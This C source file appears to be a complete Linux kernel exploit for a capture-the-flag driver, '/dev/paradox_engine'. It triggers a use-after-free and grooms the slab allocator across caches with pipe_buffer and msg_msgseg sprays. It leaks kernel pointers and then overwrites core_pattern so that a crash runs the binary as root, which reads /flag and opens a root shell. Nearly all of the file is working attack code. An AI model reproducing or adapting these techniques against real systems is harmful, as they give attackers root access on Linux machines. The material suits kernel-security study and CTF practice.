#include <pthread.h>
#include <semaphore.h>
// #include <linux/msg.h>

#define DEVICE_PATH "/dev/paradox_engine"
#define N_PAGESPRAY                0x200
// Define the size of a cred structure (adjust based on your kernel)
#define CRED_SIZE 168
// Number of children to spawn (cred spray)
#define NUM_CHILDREN 200

// Number of temporal_events to spray
#define NUM_SPRAY 200
#define FORK_SPRAY 320
#define NUM_PIPES 25
#define PIPE_BUF_SIZE 0x64
#define NUM_TASKS 50
#define CRED_JAR_INITIAL_SPRAY 200

#define CLONE_FLAGS (CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND)

// ioctl commands and structures
#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

#define PIPE_BUF_SPRAY1 50
#define DUMMY_PIPES 300
#define PIPE_BUF_SPRAY2 50
// original 250
#define NUM_MSGMSG 250

#define SYSCHK(x)                     \
	({                                \
		typeof(x) __res = (x);        \
		if (__res == (typeof(x))-1)   \
			err(1, "SYSCHK(" #x ")"); \
		__res;                        \
	})

struct paradox_timeline_req {
    uint64_t cause_timeline_id, cause_event_id;
    uint64_t new_timeline_id;
};

struct paradox_event_req {
    uint64_t target_timeline_id;
    uint64_t cause_event_id;
    char description[64];
    uint64_t new_event_id;
};

typedef struct {
    int thread_id;
    int num_events;
} thread_arg;

struct pipe_buffer
{
	void *page;
	unsigned int offset, len;
	void *ops;
	unsigned int flags;
	unsigned long private;
};

// https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606
static inline void pin_this_thread_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    int rc = pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
    if (rc) { errno = rc; perror("pthread_setaffinity_np"); exit(1); }
}

void errExit(char * msg)
{
    printf("\033[31m\033[1m[x] Error : \033[0m%s\n",msg);
    exit(-1);
}

static void die(const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);
    fputc('\n', stderr);
    exit(1);
}

static uint64_t dev_create_timeline(int fd, uint64_t cause_timeline_id, uint64_t cause_event_id) {
    struct paradox_timeline_req req;
    memset(&req, 0, sizeof(req));
    req.cause_timeline_id = cause_timeline_id;
    req.cause_event_id = cause_event_id;
    if (ioctl(fd, PARADOX_CREATE_TIMELINE, &req) != 0) die("ioctl CREATE_TIMELINE failed: %s", strerror(errno));
    return req.new_timeline_id;
}

static uint64_t dev_create_event(int fd, uint64_t tlid, uint64_t cause_eid, const char *desc) {
    struct paradox_event_req req;
    memset(&req, 0, sizeof(req));
    req.target_timeline_id = tlid;
    req.cause_event_id = cause_eid;
    snprintf(req.description, sizeof(req.description), "%s", desc ? desc : "e");
    if (ioctl(fd, PARADOX_CREATE_EVENT, &req) != 0) die("ioctl CREATE_EVENT failed: %s", strerror(errno));
    return req.new_event_id;
}

void send_msg(int qid, int size, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = 1;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}


#define OBJS_PER_SLAB 36
#define CPU_PARTIAL 120
int fd1, fd2, fd3, fd4, fd5;
sem_t ready;

void *freefd2(void *arg) {
    pin_this_thread_to_cpu(1);
    int cpu = sched_getcpu();
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
    return NULL;
}

void *fillcpu1(void *arg) {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list...\n");
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd4, 0, 0, "fd4event-cpu1");
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu1");
        }
    }
    return NULL;
}

void *freecpu1(void *arg) {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list (2)...\n");
    close(fd4);
    return NULL;
}

int pipe_fds_2[200][2];

void *spray_pipe_buf_2(void *arg) {
    pin_this_thread_to_cpu(1);
    printf("[+] Spraying pipe_buffer to reclaim victim...\n");
    
    int mult = 0x1000 / 40;
    
    for (int i = 0; i < 200; i++) {
        char* buf = malloc(0x100);
        memset(buf, 'a', 0x100);
        // TODO: Implement splicing to zero the page ptr
        int res = pipe(pipe_fds_2[i]);
        if (res < 0) printf("Failed to allocate pipe buffers\n" );
        // pipe max size is 1048576 = 0x100000 = 0x1000 * 0x100
        res = fcntl(pipe_fds_2[i][1], F_SETPIPE_SZ, 0x1000 * 64);
        if (res < 0) {
            printf("fcntl %d failed!\n", i );
        }
        // res = write(pipe_fds_2[i][1], buf, 0x100);
        // if (res < 0) {
        //     printf("[x] Write!\n");
        //     return -1;
        // }
    }
    printf("[+] Spray done\n");
    return NULL;
}

int ms_qids[NUM_MSGMSG];
void *spray_msg_msg_seg(void *arg) {
    // want to reclaim an order 2 page now
    // target kmalloc-cg-1k
    pin_this_thread_to_cpu(1);
    
    for (int i = 0; i < NUM_MSGMSG; i++) {
        ms_qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    // honestly here just pray we reclaim with msg_msgseg and not msg_msg
    // can at most send 0x2000: 
    // ~ $ cat /proc/sys/kernel/msgmax
    // 8192
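    // sizing note: struct msg_msg's header is 0x30 bytes, so the first
    // allocation holds at most 0x1000-0x30 data bytes; the remainder spills
    // into a msg_msgseg, which has an 0x8-byte header. An mtext of
    // 0x1000-0x30-0x8+0x400 bytes therefore leaves 0x400-0x8 data bytes for
    // the segment, i.e. a 0x400-byte allocation in kmalloc-cg-1k, the cache
    // we are trying to reclaim from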
    struct msgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };

    struct msgbuf *msg = malloc(sizeof(struct msgbuf));
    msg->mtype = 6;
    memset(msg->mtext, 'a', sizeof(msg->mtext));

    for (int i = 0; i < NUM_MSGMSG; i++) {
        int ret = msgsnd(ms_qids[i], msg, sizeof(msg->mtext), 0);
        if (ret < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            return NULL;
        }
    }
    return NULL;
}

// https://i.blackhat.com/Asia-24/Presentations/Asia-24-Wu-Game-of-Cross-Cache.pdf
// cross cache:
// objs_per_slab = 36
// cpu_partial = 120
// 0. pin to a cpu
// 1. allocate objs_per_slab * (cpu_partial + 1) objs to drain partially-free slabs [2]
// 2. allocate (objs_per_slab - 1) objects as pre-alloc objs [2]
// 3. allocate victim and UAF it [1]
// 4. allocate (objs_per_slab + 1) objects as post-alloc objects [2]
// 5. release all pre-alloc and post-alloc objects [2]
// 6. free one object per slab from step 1 (cpu_partial slabs) to trigger flushing for cpu partial list [2]
// 7. spray with msg_msg to reclaim [2]

int just_wait()
{
    sleep(1000000000);
}

void root(char *buf)
{
	int pid = strtoull(buf, 0, 10);
	char path[0x100];
	// fix stdin, stdout, stderr
	sprintf(path, "/proc/%d/ns/net", pid);
	int pfd = syscall(SYS_pidfd_open, pid, 0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd, 0);
	dup2(stdoutfd, 1);
	dup2(stderrfd, 2);
	// just cat the flag
	system("cat /flag; /bin/sh");
}

int cfd[2];
char dummybuf[] = "abcd"; // must be writable: read() stores a byte into it

int main(int argc, char **argv) {
    // if we were invoked by the kernel via the overwritten core_pattern
	if (argc > 1)
	{
		root(argv[1]);
		exit(0);
	}
    // everything below is the normal exploit path, run before the crash
    setvbuf(stdout, 0, _IONBF, 0);
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	if (fork() == 0)
	{
		int memfd = memfd_create("x", 0);
		SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0,
						0xffffffff));
		dup2(memfd, 666);
		close(memfd);
		// wait signal of the finished exploit
		read(cfd[0], dummybuf, 1);
		// trigger crash
		*(size_t *)0 = 0;
	}

    pin_this_thread_to_cpu(0);
    fd1 = open(DEVICE_PATH, O_RDONLY); // for cpu0 pre-alloc obj, post-alloc obj and the partial page objs to be freed
    fd2 = open(DEVICE_PATH, O_RDONLY); // uncontrollable infinite loop
    fd3 = open(DEVICE_PATH, O_RDONLY); // fd3 is never closed
    fd4 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
    fd5 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
    // getchar();
    if (fd1 < 0 || fd2 < 0 || fd3 < 0 || fd4 < 0 || fd5 < 0) die("open /dev/paradox_engine");
    printf("[+] devices opened\n");
    printf("[+] creating events...\n");
    // drain partially-free slabs
    
    // for (int i = 0; i < 34; i++) {
    //     uint64_t evt;
    //     evt = dev_create_event(fd2, 1, 0, "fd2event-pre");
    //     if (evt < 0) printf("[x] evt!");
    // }
    // uint64_t togotocpu0[CPU_PARTIAL * 2];
    // for (int i = 0; i < CPU_PARTIAL * 2; i++) {
    //     uint64_t evt;
    //     evt = dev_create_event(fd1, 0, 0, "to_go_into_cpu0");
    //     if (evt < 0) printf("[x] evt!");
    //     togotocpu0[i] = evt;
    // }

    uint64_t partiallyfrees[CPU_PARTIAL + 1];
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd1, 0, 0, "fd1event-cpu0");
            partiallyfrees[i / OBJS_PER_SLAB] = evt;
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu0");
        }
        if (evt < 0) printf("[x] evt!");
    }

    pthread_t t1;
    pthread_create(&t1, NULL, fillcpu1, NULL);
    pthread_join(t1, NULL);
    printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

    for (int i = 0; i < (CPU_PARTIAL + 1); i++) {
        uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
        if (tl < 0) printf("[x] tl!");
    }
    
    uint64_t preallocs[OBJS_PER_SLAB - 1];
    printf("[+] Creating pre-alloc objects\n");
    for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
        // pre-alloc objects
        uint64_t evt;
        if (i % 2) {
            evt = dev_create_event(fd1, 0, 0, "pre-alloc object");
        } else {
            evt = dev_create_event(fd5, 0, 0, "pre-alloc object");
        }
        if (evt < 0) printf("[x] evt!");
        preallocs[i] = evt;
    }

    printf("[+] creating self-referential event...\n");
    uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
    printf("[+] self-ref event created: e0=%llu\n", e0);
    
    printf("[+] Creating post-alloc objects\n");
    uint64_t postallocs[OBJS_PER_SLAB + 1];

    for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
        uint64_t evt;
        if (i % 2) {
            evt = dev_create_event(fd1, 0, 0, "post-alloc object");
        } else {
            evt = dev_create_event(fd5, 0, 0, "post-alloc object");
        }
        if (evt < 0) printf("[x] evt!");
        postallocs[i] = evt;
    }

    close(fd5);
    // pause();
    pthread_t t2;
    pthread_create(&t2, NULL, freecpu1, NULL);
    pthread_join(t2, NULL);
    printf("[+] Freeing self-referential event...\n");
    pthread_t t;
    pthread_create(&t, NULL, freefd2, NULL);
    // sleep(5); // bro...
    // block until the other thread enters
    sleep(1);
    printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
    close(fd1);
    
    int cpu  = sched_getcpu(); 
    printf("[+] Main thread running on cpu %d\n", cpu);
    printf("[+] About to spray...\n");
    // getchar();
    printf("[+] Spraying pipe buffer...\n");
    int pipe_fds[NUM_PIPES][2];
    int ret = 0;
    int found = 0;
    size_t cursize = 0x10;
    int changed_pipe = -1;
    // getchar();
    for (int i = 0; i < (0x1000 / 0x10); i++) {
        // printf("i: %d\n", i);
        char* buf = malloc(cursize);
        memset(buf, '\x00', cursize);
        for (int j2 = 0; j2 + 8 < cursize; j2 += 0x10) {
            buf[j2 + 8] = '\x01';
        }
        // create pipes and write contents
        for (int j = 0; j < NUM_PIPES; j++) {
            // printf("j: %d\n", j);
            int res = pipe(pipe_fds[j]);
            if (res < 0) printf("Failed to allocate pipe buffers\n" );
            ret = write(pipe_fds[j][1], buf, cursize);
            if (ret < 0) {
                printf("[x] Write!\n");
                return -1;
            }
        }
        // check if any pipes had content changed
        for (int j = 0; j < NUM_PIPES; j++) {
            // printf("j2: %d\n", j);
            char* recvbuf = malloc(cursize);
            usleep(10); // transfer control to other thread
            ret = read(pipe_fds[j][0], recvbuf, cursize);
            if (ret < 0) {
                printf("[x] Read!\n");
                return -1;
            }
            if (memcmp(recvbuf, buf, cursize) != 0) {
                printf("We got lucky! Pipe %d had content changed!\n", j);
                changed_pipe = j;
                printf("Expected: ");
                for (int k = cursize - 0x8; k < cursize; k++) {
                    printf("%02x ", (unsigned char)buf[k]);
                }
                printf("\nGot:      ");
                for (int k = cursize - 0x8; k < cursize; k++) {
                    printf("%02x ", (unsigned char)recvbuf[k]);
                }
                printf("\n");
                found = 1;
                break;
            }
        }
        if (found) {
            break;
        }
        // close all pipes
        for (int j = 0; j < NUM_PIPES; j++) {
            close(pipe_fds[j][1]);
            close(pipe_fds[j][0]);
        }
        cursize += 0x10;
    }
    if (!found) {
        printf("Victim pipe not found!\n");
        return -1;
    }
    /* 
    now we know the object's offset in the page, i.e. 0x...??0

      Now we overwrite the refcount with 1 and partially overwrite the pointer for a
      page kfree
    */
    printf("[+] Pre-stage 1\n");
    // getchar();
    printf("[+] Stage 1: Spraying pipe_buffer to claim order 10 page...\n");
    // getchar();
    int pfds[PIPE_BUF_SPRAY1][2];
    char* filler1 = malloc(0x1000);
    memset(filler1, 'A', 0x1000);
    int res;
    // stage 1: reclaiming order 10 pages using enlarged pipe_buffer structs
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        res = pipe(pfds[i]);
        if (res < 0) {
            printf("Failed to allocate pipe buffers\n" );
            return -1;
        }
        // enlarge
        // we can spray at most around 60 of these before we get cooked
        res = fcntl(pfds[i][1], F_SETPIPE_SZ, 0x1000 * 0x100);
        if (res < 0) {
            printf("fcntl %d failed!\n", i );
            return -1;
        }
        // write into bufs[0]
        res = write(pfds[i][1], filler1, 1);
        if (res < 0) {
            printf("write failed!\n" );
            return -1;
        }
    }
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        // set the first pipe_buf's op field to NULL
        // at the same time, set its pipe_buffer->offset = temporal_event->refcount = 1 :)
        read(pfds[i][0], filler1, 1);
    }
    printf("[+] Stage 1 done!\n");
    // stage 2 may crash if we were unlucky in step 1
    printf("[+] Stage 2: Using partial overwrite to free page...\n");
    // need to spray enough to push the victim pipe into free_area instead of cpu1 ?
    int dummy_pipes[DUMMY_PIPES][2];
    for (int i = 0; i < DUMMY_PIPES; i++) {
        int res = pipe(dummy_pipes[i]);
        if (res < 0) {
            printf("Failed to create pipe %d\n", i);
            break;
        }
    }
    for (int i = 0; i < DUMMY_PIPES; i++) {
        res = write(dummy_pipes[i][1], "a", 1);
        if (res < 0) {
            printf("Failed to write to pipe %d\n", i);
            break;
        }
        close(dummy_pipes[i][1]);
        close(dummy_pipes[i][0]);
    }
    close(pipe_fds[changed_pipe][1]);
    close(pipe_fds[changed_pipe][0]);
    usleep(1000);
    // getchar();
    char* buf = malloc(cursize + 3);
    memset(buf, '\x00', cursize + 3);
    buf[cursize - 0x8] = '\x01'; // refcount
    // buf[cursize + 2] = '\xa0';
    buf[cursize + 2] = '\x60';
    
    int stage_2_pipes[PIPE_BUF_SPRAY2][2];
    for (int i = 0; i < PIPE_BUF_SPRAY2; i++) {
        // printf("i: %d\n", i);
        int res = pipe(stage_2_pipes[i]);
        if (res < 0) {
            printf("Failed to allocate pipe buffers %d\n", i);
            break;
        } 
        ret = write(stage_2_pipes[i][1], buf, cursize + 3);
        if (ret < 0) {
            printf("[x] Write!\n");
            break;
        }
    }
    printf("[+] Stage 2 done!\n");
    getchar();
    printf("[+] Stage 3: Spraying msg_msgseg to reclaim page in cpu 1... (if this step hangs just re-run)\n");
    pthread_t t3;
    pthread_create(&t3, NULL, spray_msg_msg_seg, NULL);
    pthread_join(t3, NULL);
    printf("[+] Stage 3 done!\n");
    printf("[+] Stage 4: Initializing pipe_buffer to prepare for leaks...\n");
    // get vDSO addr
	size_t *vvar = ((size_t *)getauxval(AT_SYSINFO_EHDR));
	struct iovec iov = {vvar, 1};
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        // res = write(pfds[i][1], filler1, 1);
        // if (res < 0) {
        //     printf("write failed!\n" );
        //     return -1;
        // }
        // vmsplice trick
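        // getauxval(AT_SYSINFO_EHDR) returned the vDSO base, so this splices
        // the vDSO's page into the pipe: bufs[1].page now holds a pointer to
        // the vDSO's struct page in vmemmap, at a known offset from
        // core_pattern's struct page (used in Stage 6)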
        SYSCHK(vmsplice(pfds[i][1], &iov, 1, 0));
    }
    printf("[+] Stage 4 done!\n");
    // getchar();
    printf("[+] Stage 5: Leaking heap addresses using msg_msgseg and pipe_buffer overlap...\n");
    int victim_msqid = -1;
    struct leakmsgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };
    struct leakmsgbuf *leakmsg = malloc(sizeof(struct leakmsgbuf));
    memset(leakmsg, 0, sizeof(struct leakmsgbuf));
    leakmsg->mtype = 6;
    char* correct_buf = malloc(0x1000-0x30-0x8+0x400);
    memset(correct_buf, 'a', 0x1000-0x30-0x8+0x400);
    struct pipe_buffer *p;
    for (int i = 0; i < NUM_MSGMSG; i++) {
        // read msg without freeing memory
        ret = msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
        if (ret < 0) {
            perror("msgrcv"); 
            continue;
        }
        if (memcmp(leakmsg->mtext, correct_buf, 0x1000-0x30-0x8+0x400) != 0) {
            msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 6, 0);
            victim_msqid = ms_qids[i];
            printf("[+] Victim found! msqid: %d\n", victim_msqid);
            // print victim data
            for (int k = 0x1000-0x30-0x8+0x28; k < 0x1000-0x30-0x8+0x40; k++) {
                printf("%02x ", (unsigned char)leakmsg->mtext[k]);
            }
            printf("\n");
            p = (void *)&leakmsg->mtext[0x1000 - 0x30 - 0x8 + 0x28];
            break;
        }
    }
    /*
    no kaslr leaks : 
    - page leak: 0xffffea00000cf400
    - pipe_buf_ops leak: 0xffffffff82c6fe80

    kernel text:   0xffffffff81000000-0xffffffff82800000 (0x1800000 bytes)
    kernel rodata: 0xffffffff82800000-0xffffffff83497000 (0xc97000 bytes)
    kernel data:   0xffffffff83600000-0xffffffff8419d000 (0xb9d000 bytes)

        struct pipe_buffer {
            void *page;
            unsigned int offset, len;
            void *ops;
            unsigned int flags;
            unsigned long private;
        };
    */
    if (victim_msqid == -1) {
        printf("Victim msqid not found!\n");
        return -1;
    }
    void *page_leak;
    memcpy(&page_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x28, sizeof(void *));
    void *pipe_buf_ops_leak;
    memcpy(&pipe_buf_ops_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x38, sizeof(void *));
    printf("page leak: %p\n", page_leak);
    printf("pipe_buf_ops leak: %p\n", pipe_buf_ops_leak);
    printf("[+] Stage 5 done!\n");
    getchar();
    printf("[+] Stage 6: Overwriting pipe_buffer->page to point to core_pattern's page...\n");
    // modify struct page that will represent of `core_pattern`'s page
    // p->page was originally pointing vdso_image_64.data.
    // gef> p (void*)vdso_image_64
    // $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
    // gef> p &core_pattern
    // $1 = (<data variable, no debug info> *) 0xffffffff83808a60
    // gef> p 0xffffffff83808a60-0xffffffff833d0000
    // $3 = 0x438a60
    // the difference between the addresses of the pages of vdso_image_64.data and core_pattern is 0x438000
    // for every 0x1000-byte page, there is a 64-byte struct page stored in vmemmap,
    // so the difference between struct page addresses is 0x438000 / 0x1000 * 64, i.e. 0x438000 >> 6
    // (right shift by 12 bits and left shift by 6 bits)
    p->page += (0x438000 >> 6);
    // Since p->len == 1, we need to subtract one on p->offset
    p->offset = 0xa60 - 1;
    p->flags = 0x10; // PIPE_BUF_FLAG_CAN_MERGE, apply every pipe write to the page
    leakmsg->mtype = 7;
    // overwrite the pipe_buffer with msg_msgseg (with our own modified pipe_buffer content)
    int payload_msqids[0x100];
    for (int i = 0; i < 0x100; i++) {
        payload_msqids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    for (int i = 0; i < 0x100; i++) {
        ret = msgsnd(payload_msqids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0);
        if (ret < 0) {
            printf("[x] msgsnd %d!\n", i);
            return -1;
        }
    }
    printf("[+] Stage 6 done!\n");
    printf("[+] Stage 7: Overwriting core_pattern by writing into pipe_buffer...\n");
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        dprintf(pfds[i][1], "%s", "|/proc/%P/fd/666 %P\n");
    }
    printf("[+] Stage 7 done!\n");
    // show content of core_pattern
	system("cat /proc/sys/kernel/core_pattern");
	// trigger root shell
    // getchar();
    
    write(cfd[1], dummybuf, 1);
    while (1) {
        sleep(100);
    }

    return 0;
}   
